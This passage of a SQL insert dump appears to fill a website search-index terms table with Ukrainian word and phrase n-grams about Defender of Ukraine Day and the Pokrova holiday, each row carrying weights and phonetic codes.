сучасних',0,1,1.7333,'м000',1,'*'),(1592431,'минулого','минулого',0,0,0.5333,'м000',1,'*'),(1592432,'минулого успадкували','минулого успадкували',0,1,1.6667,'м000',1,'*'),(1592433,'минулого успадкували бійці','минулого успадкували бійці',0,1,1.8667,'м000',1,'*'),(1592434,'модернізується','модернізується',0,0,0.9333,'м000',1,'*'),(1592435,'модернізується позбувається','модернізується позбувається',0,1,1.9,'м000',1,'*'),(1592436,'модернізується позбувається радянської','модернізується позбувається радянської',0,1,2,'м000',1,'*'),(1592437,'на основі','на основі',0,1,1.3,'н000',2,'*'),(1592438,'на основі спільних','на основі спільних',0,1,1.6,'н000',1,'*'),(1592439,'назвах','назвах',0,0,0.4,'н000',1,'*'),(1592440,'назвах військових','назвах військових',0,1,1.5667,'н000',1,'*'),(1592441,'назвах військових частин','назвах військових частин',0,1,1.8,'н000',1,'*'),(1592442,'назву','назву',0,0,0.3333,'н000',1,'*'),(1592443,'назву козацька','назву козацька',0,1,1.4667,'н000',1,'*'),(1592444,'назву козацька покрова','назву козацька покрова',0,1,1.7333,'н000',1,'*'),(1592445,'найкращі','найкращі',0,0,0.5333,'н000',1,'*'),(1592446,'найкращі традиції','найкращі традиції',0,1,1.5667,'н000',1,'*'),(1592447,'найкращі традиції захисників','найкращі традиції захисників',0,1,1.9333,'н000',1,'*'),(1592448,'наразі','наразі',0,0,0.4,'н000',1,'*'),(1592449,'наразі українська','наразі українська',0,1,1.5667,'н000',1,'*'),(1592450,'наразі українська армія','наразі українська армія',0,1,1.7667,'н000',1,'*'),(1592451,'національної','національної',0,0,0.8,'н000',1,'*'),(1592452,'національної гвардії','національної гвардії',0,1,1.6667,'н000',1,'*'),(1592453,'національної гвардії правоохоронних','національної гвардії правоохоронних',0,1,2,'н000',1,'*'),(1592454,'нашої історії','нашої історії',0,1,1.4333,'н000',1,'*'),(1592455,'нашої історії це','нашої історії це',0,1,1.5333,'н000',1,'*'),(1592456,'нашу','нашу',0,0,0.2667,'н000',2,'*'),(1592457,'нашу незалежність','нашу незалежність',0,1,1.5667,'н000',1,'*'),(1592458,'нашу незалежність і','нашу незалежність і',0,1,1.6333,'н000',1,'*'),(1592459,'незалежність','незалежність',0,0,0.8,'н000',2,'*'),(1592460,'незалежність і','незалежність і',0,1,1.4667,'н000',1,'*'),(1592461,'незалежність і територіальну','незалежність і територіальну',0,1,1.9333,'н000',1,'*'),(1592462,'незалежність україни','незалежність україни',0,1,1.6667,'н000',1,'*'),(1592463,'незалежність україни наразі','незалежність україни наразі',0,1,1.9,'н000',1,'*'),(1592464,'незалежно від службового','незалежно від службового',0,1,1.8,'н000',1,'*'),(1592465,'неможливо','неможливо',0,0,0.6,'н000',1,'*'),(1592466,'неможливо тож','неможливо тож',0,1,1.4333,'н000',1,'*'),(1592467,'неможливо тож боєздатне','неможливо тож боєздатне',0,1,1.7667,'н000',1,'*'),(1592468,'необхідно згадати','необхідно згадати',0,1,1.5667,'н000',1,'*'),(1592469,'необхідно згадати загиблих','необхідно згадати загиблих',0,1,1.8667,'н000',1,'*'),(1592470,'нероздільно','нероздільно',0,0,0.7333,'н000',1,'*'),(1592471,'нероздільно пов\'язаний','нероздільно пов',0,1,1.7333,'н000',1,'*'),(1592472,'нероздільно пов\'язаний із','нероздільно пов із',0,1,1.8333,'н000',1,'*'),(1592473,'обороняли','обороняли',0,0,0.6,'о000',1,'*'),(1592474,'обороняли і','обороняли і',0,1,1.3667,'о000',1,'*'),(1592475,'обороняли і обороняють','обороняли і обороняють',0,1,1.7333,'о000',1,'*'),(1592476,'обороняють','обороняють',0,0,0.6667,'о000',1,'*'),(1592477,'обороняють нашу','обороняють нашу',0,1,1.5,'о000',1,'*'),(1592478,'обороняють нашу незалежність','обороняють нашу незалежність',0,1,1.9333,'о000',1,'*'),(1592479,'одностроях','одностроях',0,0,0.6667,'о000',1,'*'),(1592480,'одностроях тощо','одностроях тощо',0,1,1.5,'о000',1,'*'),(1592481,'одностроях тощо 14','одностроях тощо 14',0,1,1.6,'о000',1,'*'),(1592482,'окупанта','окупанта',0,0,0.5333,'о000',1,'*'),(1592483,'окупанта без','окупанта без',0,1,1.4,'о000',1,'*'),(1592484,'окупанта без збройної','окупанта без збройної',0,1,1.7,'о000',1,'*'),(1592485,'органів','органів',0,0,0.4667,'о000',2,'*'),(1592486,'органів і','органів і',0,1,1.3,'о000',1,'*'),(1592487,'органів і добровольчих','органів і добровольчих',0,1,1.7333,'о000',1,'*'),(1592488,'основі','основі',0,0,0.4,'о000',2,'*'),(1592489,'основі спільних','основі спільних',0,1,1.5,'о000',1,'*'),(1592490,'основі спільних цінностей','основі спільних цінностей',0,1,1.8333,'о000',1,'*'),(1592491,'отримало','отримало',0,0,0.5333,'о000',1,'*'),(1592492,'отримало другу','отримало другу',0,1,1.4667,'о000',1,'*'),(1592493,'отримало другу назву','отримало другу назву',0,1,1.6667,'о000',1,'*'),(1592494,'пов\'язане','пов',0,0,0.6,'п000',1,'*'),(1592495,'пов\'язане з','пов з',0,1,1.3667,'п000',1,'*'),(1592496,'пов\'язане з розвитком','пов з розвитком',0,1,1.7,'п000',1,'*'),(1592497,'пов\'язаний','пов',0,0,0.6667,'п000',1,'*'),(1592498,'пов\'язаний із','пов із',0,1,1.4333,'п000',1,'*'),(1592499,'пов\'язаний із розвитком','пов із розвитком',0,1,1.7667,'п000',1,'*'),(1592500,'поваги','поваги',0,0,0.4,'п000',1,'*'),(1592501,'поваги до','поваги до',0,1,1.3,'п000',1,'*'),(1592502,'поваги до власної','поваги до власної',0,1,1.5667,'п000',1,'*'),(1592503,'повстанської армії з','повстанської армії з',0,1,1.6667,'п000',1,'*'),(1592504,'подякувати','подякувати',0,0,0.6667,'п000',1,'*'),(1592505,'подякувати всім','подякувати всім',0,1,1.5,'п000',1,'*'),(1592506,'подякувати всім громадянам','подякувати всім громадянам',0,1,1.8667,'п000',1,'*'),(1592507,'позбувається','позбувається',0,0,0.8,'п000',1,'*'),(1592508,'позбувається радянської','позбувається радянської',0,1,1.7667,'п000',1,'*'),(1592509,'позбувається радянської спадщини','позбувається радянської спадщини',0,1,2,'п000',1,'*'),(1592510,'покрова українське','покрова українське',0,1,1.6,'п000',1,'*'),(1592511,'покрова українське військо','покрова українське військо',0,1,1.8667,'п000',1,'*'),(1592512,'покрову пресвятої','покрову пресвятої',0,1,1.5667,'п000',1,'*'),(1592513,'покрову пресвятої богородиці','покрову пресвятої богородиці',0,1,1.9333,'п000',1,'*'),(1592514,'поціновують','поціновують',0,0,0.7333,'п000',1,'*'),(1592515,'поціновують воїнів','поціновують воїнів',0,1,1.6,'п000',1,'*'),(1592516,'поціновують воїнів які','поціновують воїнів які',0,1,1.7333,'п000',1,'*'),(1592517,'початком','початком',0,0,0.5333,'п000',1,'*'),(1592518,'початком сучасної','початком сучасної',0,1,1.5667,'п000',1,'*'),(1592519,'початком сучасної російсько-української','початком сучасної російсько-української',0,1,2,'п000',1,'*'),(1592520,'правоохоронних','правоохоронних',0,0,0.9333,'п000',1,'*'),(1592521,'правоохоронних органів','правоохоронних органів',0,1,1.7333,'п000',1,'*'),(1592522,'правоохоронних органів і','правоохоронних органів і',0,1,1.8,'п000',1,'*'),(1592523,'прапорах','прапорах',0,0,0.5333,'п000',1,'*'),(1592524,'прапорах одностроях','прапорах одностроях',0,1,1.6333,'п000',1,'*'),(1592525,'прапорах одностроях тощо','прапорах одностроях тощо',0,1,1.8,'п000',1,'*'),(1592526,'президента','президента',0,0,0.6667,'п000',1,'*'),(1592527,'президента україни','президента україни',0,1,1.6,'п000',1,'*'),(1592528,'президента україни 806','президента україни 806',0,1,1.7333,'п000',1,'*'),(1592529,'пресвятої богородиці відзначали','пресвятої богородиці відзначали',0,1,2,'п000',1,'*'),(1592530,'присвятили','присвятили',0,0,0.6667,'п000',1,'*'),(1592531,'присвятили життя','присвятили життя',0,1,1.5333,'п000',1,'*'),(1592532,'присвятили життя захисту','присвятили життя захисту',0,1,1.8,'п000',1,'*'),(1592533,'різні','різні',0,0,0.3333,'р000',2,'*'),(1592534,'різні часи','різні часи',0,1,1.3333,'р000',1,'*'),(1592535,'різні часи обороняли','різні часи обороняли',0,1,1.6667,'р000',1,'*'),(1592536,'різних','різних',0,0,0.4,'р000',3,'*'),(1592537,'різних епох','різних епох',0,1,1.3667,'р000',1,'*'),(1592538,'різних епох нашої','різних епох нашої',0,1,1.5667,'р000',1,'*'),(1592539,'радянської','радянської',0,0,0.6667,'р000',1,'*'),(1592540,'радянської спадщини','радянської спадщини',0,1,1.6333,'р000',1,'*'),(1592541,'радянської спадщини та','радянської спадщини та',0,1,1.7333,'р000',1,'*'),(1592542,'розвитком','розвитком',0,0,0.6,'р000',1,'*'),(1592543,'розвитком війська','розвитком війська',0,1,1.5667,'р000',1,'*'),(1592544,'розвитком війська від','розвитком війська від',0,1,1.7,'р000',1,'*'),(1592545,'розвитком українського','розвитком українського',0,1,1.7333,'р000',1,'*'),(1592546,'розвитком українського війська','розвитком українського війська',0,1,2,'р000',1,'*'),(1592547,'років зберігало','років зберігало',0,1,1.5,'р000',1,'*'),(1592548,'років зберігало козацькі','років зберігало козацькі',0,1,1.8,'р000',1,'*'),(1592549,'року вважається','року вважається',0,1,1.5,'р000',1,'*'),(1592550,'року вважається символічним','року вважається символічним',0,1,1.9,'р000',1,'*'),(1592551,'року у','року у',0,1,1.2,'р000',1,'*'),(1592552,'року у цей','року у цей',0,1,1.3333,'р000',1,'*'),(1592553,'російським','російським',0,0,0.6667,'р000',1,'*'),(1592554,'російським агресором','російським агресором',0,1,1.6667,'р000',1,'*'),(1592555,'російським агресором історія','російським агресором історія',0,1,1.9333,'р000',1,'*'),(1592556,'російсько-української','російсько-української',0,0,1,'р000',1,'*'),(1592557,'російсько-української війнимайже','російсько-української війнимайже',0,1,2,'р000',1,'*'),(1592558,'російсько-української війнимайже чотириста','російсько-української війнимайже чотириста',0,1,2,'р000',1,'*'),(1592559,'російської','російської',0,0,0.6667,'р000',1,'*'),(1592560,'російської федерації','російської федерації',0,1,1.6667,'р000',1,'*'),(1592561,'російської федерації та','російської федерації та',0,1,1.7667,'р000',1,'*'),(1592562,'рук','рук',0,0,0.2,'р000',1,'*'),(1592563,'рук у','рук у',0,1,1.1667,'р000',1,'*'),(1592564,'рук у лавах','рук у лавах',0,1,1.3667,'р000',1,'*'),(1592565,'русі','русі',0,0,0.2667,'р000',1,'*'),(1592566,'русі найкращі','русі найкращі',0,1,1.4333,'р000',1,'*'),(1592567,'русі найкращі традиції','русі найкращі традиції',0,1,1.7333,'р000',1,'*'),(1592568,'свята має','свята має',0,1,1.3,'с000',1,'*'),(1592569,'свята має давню','свята має давню',0,1,1.5,'с000',1,'*'),(1592570,'свято встановлено','свято встановлено',0,1,1.5667,'с000',1,'*'),(1592571,'свято встановлено указом','свято встановлено указом',0,1,1.8,'с000',1,'*'),(1592572,'свято отримало','свято отримало',0,1,1.4667,'с000',1,'*'),(1592573,'свято отримало другу','свято отримало другу',0,1,1.6667,'с000',1,'*'),(1592574,'свято пов\'язане','свято пов',0,1,1.5,'с000',1,'*'),(1592575,'свято пов\'язане з','свято пов з',0,1,1.5667,'с000',1,'*'),(1592576,'сил','сил',0,0,0.2,'с000',1,'*'),(1592577,'сил національної','сил національної',0,1,1.5333,'с000',1,'*'),(1592578,'сил національної гвардії','сил національної гвардії',0,1,1.8,'с000',1,'*'),(1592579,'сил україни','сил україни',0,1,1.3667,'с000',1,'*'),(1592580,'сил україни які','сил україни які',0,1,1.5,'с000',1,'*'),(1592581,'символічним','символічним',0,0,0.7333,'с000',1,'*'),(1592582,'символічним днем','символічним днем',0,1,1.5333,'с000',1,'*'),(1592583,'символічним днем утворення','символічним днем утворення',0,1,1.8667,'с000',1,'*'),(1592584,'службового','службового',0,0,0.6667,'с000',1,'*'),(1592585,'службового становища','службового становища',0,1,1.6667,'с000',1,'*'),(1592586,'службового становища та','службового становища та',0,1,1.7667,'с000',1,'*'),(1592587,'спільних','спільних',0,0,0.5333,'с000',1,'*'),(1592588,'спільних цінностей','спільних цінностей',0,1,1.6,'с000',1,'*'),(1592589,'спільних цінностей та','спільних цінностей та',0,1,1.7,'с000',1,'*'),(1592590,'спадщини','спадщини',0,0,0.5333,'с000',1,'*'),(1592591,'спадщини та','спадщини та',0,1,1.3667,'с000',1,'*'),(1592592,'спадщини та відновлює','спадщини та відновлює',0,1,1.7,'с000',1,'*'),(1592593,'становища','становища',0,0,0.6,'с000',1,'*'),(1592594,'становища та','становища та',0,1,1.4,'с000',1,'*'),(1592595,'становища та статі','становища та статі',0,1,1.6,'с000',1,'*'),(1592596,'статі','статі',0,0,0.3333,'с000',1,'*'),(1592597,'статі це','статі це',0,1,1.2667,'с000',1,'*'),(1592598,'статі це свято','статі це свято',0,1,1.4667,'с000',1,'*'),(1592599,'структурі','структурі',0,0,0.6,'с000',1,'*'),(1592600,'структурі прапорах','структурі прапорах',0,1,1.6,'с000',1,'*'),(1592601,'структурі прапорах одностроях','структурі прапорах одностроях',0,1,1.9667,'с000',1,'*'),(1592602,'суверенітет','суверенітет',0,0,0.7333,'с000',1,'*'),(1592603,'суверенітет україни','суверенітет україни',0,1,1.6333,'с000',1,'*'),(1592604,'суверенітет україни у','суверенітет україни у',0,1,1.7,'с000',1,'*'),(1592605,'суспільства','суспільства',0,0,0.7333,'с000',2,'*'),(1592606,'суспільства на','суспільства на',0,1,1.4667,'с000',1,'*'),(1592607,'суспільства на основі','суспільства на основі',0,1,1.7,'с000',1,'*'),(1592608,'сучасних','сучасних',0,0,0.5333,'с000',1,'*'),(1592609,'сучасних захисників','сучасних захисників',0,1,1.6333,'с000',1,'*'),(1592610,'сучасних захисників україни','сучасних захисників україни',0,1,1.9,'с000',1,'*'),(1592611,'сучасних збройних','сучасних збройних',0,1,1.5667,'с000',1,'*'),(1592612,'сучасних збройних сил','сучасних збройних сил',0,1,1.7,'с000',1,'*'),(1592613,'сучасної','сучасної',0,0,0.5333,'с000',1,'*'),(1592614,'сучасної російсько-української','сучасної російсько-української',0,1,2,'с000',1,'*'),(1592615,'сучасної російсько-української війнимайже','сучасної російсько-української війнимайже',0,1,2,'с000',1,'*'),(1592616,'сьогодні','сьогодні',0,0,0.5333,'с000',3,'*'),(1592617,'сьогодні відстоюють','сьогодні відстоюють',0,1,1.6333,'с000',1,'*'),(1592618,'сьогодні відстоюють суверенітет','сьогодні відстоюють суверенітет',0,1,2,'с000',1,'*'),(1592619,'та відновлює','та відновлює',0,1,1.4,'т000',1,'*'),(1592620,'та відновлює українські','та відновлює українські',0,1,1.7667,'т000',1,'*'),(1592621,'та відстояти','та відстояти',0,1,1.4,'т000',1,'*'),(1592622,'та відстояти незалежність','та відстояти незалежність',0,1,1.8333,'т000',1,'*'),(1592623,'та героїв','та героїв',0,1,1.3,'т000',1,'*'),(1592624,'та героїв різних','та героїв різних',0,1,1.5333,'т000',1,'*'),(1592625,'та його','та його',0,1,1.2333,'т000',1,'*'),(1592626,'та його військових','та його військових',0,1,1.6,'т000',1,'*'),(1592627,'та поваги','та поваги',0,1,1.3,'т000',1,'*'),(1592628,'та поваги до','та поваги до',0,1,1.4,'т000',1,'*'),(1592629,'та статі','та статі',0,1,1.2667,'т000',1,'*'),(1592630,'та статі це','та статі це',0,1,1.3667,'т000',1,'*'),(1592631,'територіальної','територіальної',0,0,0.9333,'т000',1,'*'),(1592632,'територіальної цілісності','територіальної цілісності',0,1,1.8333,'т000',1,'*'),(1592633,'територіальної цілісності країни','територіальної цілісності країни',0,1,2,'т000',1,'*'),(1592634,'територіальну','територіальну',0,0,0.8667,'т000',1,'*'),(1592635,'територіальну цілісність','територіальну цілісність',0,1,1.8,'т000',1,'*'),(1592636,'територіальну цілісність усіх','територіальну цілісність усіх',0,1,1.9667,'т000',1,'*'),(1592637,'територію','територію',0,0,0.6,'т000',1,'*'),(1592638,'територію від','територію від',0,1,1.4333,'т000',1,'*'),(1592639,'територію від окупанта','територію від окупанта',0,1,1.7333,'т000',1,'*'),(1592640,'тисяч','тисяч',0,0,0.3333,'т000',1,'*'),(1592641,'тисяч українців','тисяч українців',0,1,1.5,'т000',1,'*'),(1592642,'тисяч українців взяли','тисяч українців взяли',0,1,1.7,'т000',1,'*'),(1592643,'тож','тож',0,0,0.2,'т000',2,'*'),(1592644,'тож боєздатне','тож боєздатне',0,1,1.4333,'т000',1,'*'),(1592645,'тож боєздатне військо','тож боєздатне військо',0,1,1.7,'т000',1,'*'),(1592646,'тощо','тощо',0,0,0.2667,'т000',1,'*'),(1592647,'тощо 14','тощо 14',0,1,1.2333,'т000',1,'*'),(1592648,'тощо 14 жовтня','тощо 14 жовтня',0,1,1.4667,'т000',1,'*'),(1592649,'традиції','традиції',0,0,0.5333,'т000',1,'*'),(1592650,'традиції в','традиції в',0,1,1.3333,'т000',1,'*'),(1592651,'традиції в назвах','традиції в назвах',0,1,1.5667,'т000',1,'*'),(1592652,'традиції захисників','традиції захисників',0,1,1.6333,'т000',1,'*'),(1592653,'традиції захисників минулого','традиції захисників минулого',0,1,1.9333,'т000',1,'*'),(1592654,'традиції у','традиції у',0,1,1.3333,'т000',1,'*'),(1592655,'традиції у день','традиції у день',0,1,1.5,'т000',1,'*'),(1592656,'традицій','традицій',0,0,0.5333,'т000',1,'*'),(1592657,'традицій щорічне','традицій щорічне',0,1,1.5333,'т000',1,'*'),(1592658,'традицій щорічне державне','традицій щорічне державне',0,1,1.8333,'т000',1,'*'),(1592659,'традицію','традицію',0,0,0.5333,'т000',1,'*'),(1592660,'традицію покрову','традицію покрову',0,1,1.5333,'т000',1,'*'),(1592661,'традицію покрову пресвятої','традицію покрову пресвятої',0,1,1.8667,'т000',1,'*'),(1592662,'у війні','у війні',0,1,1.2333,'у000',1,'*'),(1592663,'у війні з','у війні з',0,1,1.3,'у000',1,'*'),(1592664,'у день','у день',0,1,1.2,'у000',1,'*'),(1592665,'у день захисника','у день захисника',0,1,1.5333,'у000',1,'*'),(1592666,'у лавах','у лавах',0,1,1.2333,'у000',1,'*'),(1592667,'у лавах збройних','у лавах збройних',0,1,1.5333,'у000',1,'*'),(1592668,'у цей','у цей',0,1,1.1667,'у000',1,'*'),(1592669,'у цей день','у цей день',0,1,1.3333,'у000',1,'*'),(1592670,'указом','указом',0,0,0.4,'у000',1,'*'),(1592671,'указом президента','указом президента',0,1,1.5667,'у000',1,'*'),(1592672,'указом президента україни','указом президента україни',0,1,1.8333,'у000',1,'*'),(1592673,'україні','україні',0,0,0.4667,'у000',2,'*'),(1592674,'україні відзначається','україні відзначається',0,1,1.7,'у000',1,'*'),(1592675,'україні відзначається день','україні відзначається день',0,1,1.8667,'у000',1,'*'),(1592676,'україни 806','україни 806',0,1,1.3667,'у000',1,'*'),(1592677,'україни 806 від','україни 806 від',0,1,1.5,'у000',1,'*'),(1592678,'україни ми','україни ми',0,1,1.3333,'у000',1,'*'),(1592679,'україни ми вшановуємо','україни ми вшановуємо',0,1,1.7,'у000',1,'*'),(1592680,'україни наразі','україни наразі',0,1,1.4667,'у000',1,'*'),(1592681,'україни наразі українська','україни наразі українська',0,1,1.8333,'у000',1,'*'),(1592682,'україни незалежно','україни незалежно',0,1,1.5667,'у000',1,'*'),(1592683,'україни незалежно від','україни незалежно від',0,1,1.7,'у000',1,'*'),(1592684,'україни та','україни та',0,1,1.3333,'у000',2,'*'),(1592685,'україни та героїв','україни та героїв',0,1,1.5667,'у000',1,'*'),(1592686,'україни у','україни у',0,1,1.3,'у000',1,'*'),(1592687,'україни у війні','україни у війні',0,1,1.5,'у000',1,'*'),(1592688,'україни які','україни які',0,1,1.3667,'у000',1,'*'),(1592689,'україни які сьогодні','україни які сьогодні',0,1,1.6667,'у000',1,'*'),(1592690,'україни який','україни який',0,1,1.4,'у000',1,'*'),(1592691,'україни який нероздільно','україни який нероздільно',0,1,1.8,'у000',1,'*'),(1592692,'українські військові','українські військові',0,1,1.6667,'у000',1,'*'),(1592693,'українські військові традиції','українські військові традиції',0,1,1.9667,'у000',1,'*'),(1592694,'українська','українська',0,0,0.6667,'у000',1,'*'),(1592695,'українська армія','українська армія',0,1,1.5333,'у000',1,'*'),(1592696,'українська армія активно','українська армія активно',0,1,1.8,'у000',1,'*'),(1592697,'українське','українське',0,0,0.6667,'у000',1,'*'),(1592698,'українське військо','українське військо',0,1,1.6,'у000',1,'*'),(1592699,'українське військо 1917','українське військо 1917',0,1,1.7667,'у000',1,'*'),(1592700,'української держави','української держави',0,1,1.6333,'у000',1,'*'),(1592701,'української держави звільнити','української держави звільнити',0,1,1.9667,'у000',1,'*'),(1592702,'українського','українського',0,0,0.8,'у000',1,'*'),(1592703,'українського війська','українського війська',0,1,1.6667,'у000',1,'*'),(1592704,'українського війська та','українського війська та',0,1,1.7667,'у000',1,'*'),(1592705,'українську','українську',0,0,0.6667,'у000',1,'*'),(1592706,'українську територію','українську територію',0,1,1.6667,'у000',1,'*'),(1592707,'українську територію від','українську територію від',0,1,1.8,'у000',1,'*'),(1592708,'українці','українці',0,0,0.5333,'у000',2,'*'),(1592709,'українці поціновують','українці поціновують',0,1,1.6667,'у000',1,'*'),(1592710,'українці поціновують воїнів','українці поціновують воїнів',0,1,1.9,'у000',1,'*'),(1592711,'українців','українців',0,0,0.6,'у000',1,'*'),(1592712,'українців взяли','українців взяли',0,1,1.5,'у000',1,'*'),(1592713,'українців взяли зброю','українців взяли зброю',0,1,1.7,'у000',1,'*'),(1592714,'усіх','усіх',0,0,0.2667,'у000',3,'*'),(1592715,'усіх захисників','усіх захисників',0,1,1.5,'у000',1,'*'),(1592716,'усіх захисників україни','усіх захисників україни',0,1,1.7667,'у000',1,'*'),(1592717,'успадкували','успадкували',0,0,0.7333,'у000',1,'*'),(1592718,'успадкували бійці','успадкували бійці',0,1,1.5667,'у000',1,'*'),(1592719,'успадкували бійці сучасних','успадкували бійці сучасних',0,1,1.8667,'у000',1,'*'),(1592720,'утворення','утворення',0,0,0.6,'у000',1,'*'),(1592721,'утворення української','утворення української',0,1,1.7,'у000',1,'*'),(1592722,'утворення української повстанської','утворення української повстанської',0,1,2,'у000',1,'*'),(1592723,'федерації','федерації',0,0,0.6,'ф000',1,'*'),(1592724,'федерації та','федерації та',0,1,1.4,'ф000',1,'*'),(1592725,'федерації та відстояти','федерації та відстояти',0,1,1.7333,'ф000',1,'*'),(1592726,'формувань','формувань',0,0,0.6,'ф000',1,'*'),(1592727,'формувань щоб','формувань щоб',0,1,1.4333,'ф000',1,'*'),(1592728,'формувань щоб зупинити','формувань щоб зупинити',0,1,1.7333,'ф000',1,'*'),(1592729,'цілісність','цілісність',0,0,0.6667,'ц000',1,'*'),(1592730,'цілісність усіх','цілісність усіх',0,1,1.5,'ц000',1,'*'),(1592731,'цілісність усіх захисників','цілісність усіх захисників',0,1,1.8667,'ц000',1,'*'),(1592732,'цілісності','цілісності',0,0,0.6667,'ц000',1,'*'),(1592733,'цілісності країни','цілісності країни',0,1,1.5667,'ц000',1,'*'),(1592734,'цінностей','цінностей',0,0,0.6,'ц000',1,'*'),(1592735,'цінностей та','цінностей та',0,1,1.4,'ц000',1,'*'),(1592736,'цінностей та поваги','цінностей та поваги',0,1,1.6333,'ц000',1,'*'),(1592737,'це день','це день',0,1,1.2333,'ц000',1,'*'),(1592738,'це день коли','це день коли',0,1,1.4,'ц000',1,'*'),(1592739,'це свято','це свято',0,1,1.2667,'ц000',1,'*'),(1592740,'це свято пов\'язане','це свято пов',0,1,1.6,'ц000',1,'*'),(1592741,'цей день','цей день',0,1,1.2667,'ц000',1,'*'),(1592742,'цей день українці','цей день українці',0,1,1.5667,'ц000',1,'*'),(1592743,'цього свята','цього свята',0,1,1.3667,'ц000',1,'*'),(1592744,'цього свята має','цього свята має',0,1,1.5,'ц000',1,'*'),(1592745,'часів','часів',0,0,0.3333,'ч000',1,'*'),(1592746,'часів русі','часів русі',0,1,1.3333,'ч000',1,'*'),(1592747,'часів русі найкращі','часів русі найкращі',0,1,1.6333,'ч000',1,'*'),(1592748,'часи обороняли','часи обороняли',0,1,1.4667,'ч000',1,'*'),(1592749,'часи обороняли і','часи обороняли і',0,1,1.5333,'ч000',1,'*'),(1592750,'частин','частин',0,0,0.4,'ч000',1,'*'),(1592751,'частин структурі','частин структурі',0,1,1.5333,'ч000',1,'*'),(1592752,'частин структурі прапорах','частин структурі прапорах',0,1,1.8333,'ч000',1,'*'),(1592753,'чотириста','чотириста',0,0,0.6,'ч000',1,'*'),(1592754,'чотириста тисяч','чотириста тисяч',0,1,1.5,'ч000',1,'*'),(1592755,'чотириста тисяч українців','чотириста тисяч українців',0,1,1.8333,'ч000',1,'*'),(1592756,'що свято','що свято',0,1,1.2667,'щ000',1,'*'),(1592757,'що свято отримало','що свято отримало',0,1,1.5667,'щ000',1,'*'),(1592758,'щоб','щоб',0,0,0.2,'щ000',4,'*'),(1592759,'щоб зупинити','щоб зупинити',0,1,1.4,'щ000',1,'*'),(1592760,'щоб зупинити агресію','щоб зупинити агресію',0,1,1.6667,'щ000',1,'*'),(1592761,'щорічне','щорічне',0,0,0.4667,'щ000',1,'*'),(1592762,'щорічне державне','щорічне державне',0,1,1.5333,'щ000',1,'*'),(1592763,'щорічне державне свято','щорічне державне свято',0,1,1.7333,'щ000',1,'*'),(1592764,'які в','які в',0,1,1.1667,'я000',1,'*'),(1592765,'які в різні','які в різні',0,1,1.3667,'я000',1,'*'),(1592766,'які присвятили','які присвятили',0,1,1.4667,'я000',1,'*'),(1592767,'які присвятили життя','які присвятили життя',0,1,1.6667,'я000',1,'*'),(1592768,'які сьогодні','які сьогодні',0,1,1.4,'я000',1,'*'),(1592769,'які сьогодні відстоюють','які сьогодні відстоюють',0,1,1.7667,'я000',1,'*'),(1592770,'який','який',0,0,0.2667,'я000',7,'*'),(1592771,'який нероздільно','який нероздільно',0,1,1.5333,'я000',1,'*'),(1592772,'який нероздільно пов\'язаний','який нероздільно пов',0,1,1.9,'я000',1,'*'),(1596447,'депутати','депутати',0,0,0.5333,'д000',4,'*'),(1596565,'організації','організації',0,0,0.7333,'о000',2,'*'),(1596566,'організації партії','організації партії',0,1,1.6,'о000',2,'*'),(1596576,'партії','партії',0,0,0.4,'п000',4,'*'),(1596623,'у депутати','у депутати',0,1,1.3333,'у000',3,'*'),(1602890,'14 zhovtnya svyato','14 zhovtnya svyato',0,1,1.6,'Z135213',1,'*'),(1602891,'14 жовтня випадає','14 жовтня випадає',0,1,1.5667,'ж000',1,'*'),(1602892,'14 жовтня на','14 жовтня на',0,1,1.4,'ж000',1,'*'),(1602893,'14 жовтня свято','14 жовтня свято',0,1,1.5,'ж000',1,'*'),(1602894,'1775','1775',0,0,0.4,'',1,'*'),(1602895,'1775 році','1775 році',0,1,1.3,'р000',1,'*'),(1602896,'1775 році козаки','1775 році козаки',0,1,1.5333,'р000',1,'*'),(1602897,'2479','2479',0,0,0.4,'',1,'*'),(1602898,'910','910',0,0,0.3,'',1,'*'),(1602899,'910 році','910 році',0,1,1.2667,'р000',1,'*'),(1602900,'910 році богородиця','910 році богородиця',0,1,1.6333,'р000',1,'*'),(1602901,'bogoroditsi','bogoroditsi',0,0,0.7333,'B2632',1,'*'),(1602902,'bogoroditsi ta','bogoroditsi ta',0,1,1.4667,'B26323',1,'*'),(1602903,'bogoroditsi ta prisnodivi','bogoroditsi ta prisnodivi',0,1,1.8333,'B26323162531',1,'*'),(1602904,'mariji','mariji',0,0,0.4,'M620',1,'*'),(1602905,'nashoji','nashoji',0,0,0.4667,'N200',1,'*'),(1602906,'nashoji bogoroditsi','nashoji bogoroditsi',0,1,1.6333,'N212632',1,'*'),(1602907,'nashoji bogoroditsi ta','nashoji bogoroditsi ta',0,1,1.7333,'N2126323',1,'*'),(1602908,'pokrovi','pokrovi',0,0,0.4667,'P261',1,'*'),(1602909,'pokrovi presvyatoji','pokrovi presvyatoji',0,1,1.6333,'P26162132',1,'*'),(1602910,'pokrovi presvyatoji vladichitsi','pokrovi presvyatoji vladichitsi',0,1,2,'P26162132143232',1,'*'),(1602911,'presvyatoji','presvyatoji',0,0,0.7333,'P62132',1,'*'),(1602912,'presvyatoji vladichitsi','presvyatoji vladichitsi',0,1,1.7667,'P62132143232',1,'*'),(1602913,'presvyatoji vladichitsi nashoji','presvyatoji vladichitsi nashoji',0,1,2,'P6213214323252',1,'*'),(1602914,'prisnodivi','prisnodivi',0,0,0.6667,'P62531',1,'*'),(1602915,'prisnodivi mariji','prisnodivi mariji',0,1,1.5667,'P62531562',1,'*'),(1602916,'svyato','svyato',0,0,0.4,'S130',1,'*'),(1602917,'svyato pokrovi','svyato pokrovi',0,1,1.4667,'S131261',1,'*'),(1602918,'svyato pokrovi presvyatoji','svyato pokrovi presvyatoji',0,1,1.8667,'S13126162132',1,'*'),(1602919,'ta prisnodivi','ta prisnodivi',0,1,1.4333,'T162531',1,'*'),(1602920,'ta prisnodivi mariji','ta prisnodivi mariji',0,1,1.6667,'T162531562',1,'*'),(1602921,'vladichitsi','vladichitsi',0,0,0.7333,'V43232',1,'*'),(1602922,'vladichitsi nashoji','vladichitsi nashoji',0,1,1.6333,'V4323252',1,'*'),(1602923,'vladichitsi nashoji bogoroditsi','vladichitsi nashoji bogoroditsi',0,1,2,'V432325212632',1,'*'),(1602924,'zhovtnya svyato','zhovtnya svyato',0,1,1.5,'Z135213',1,'*'),(1602925,'zhovtnya svyato pokrovi','zhovtnya svyato pokrovi',0,1,1.7667,'Z1352131261',1,'*'),(1602926,'«козацька','«козацька',0,0,0.6,'к000',1,'*'),(1602927,'«козацька покрова»,','«козацька покрова»,',0,1,1.6333,'к000',1,'*'),(1602928,'«козацька покрова», на','«козацька покрова», 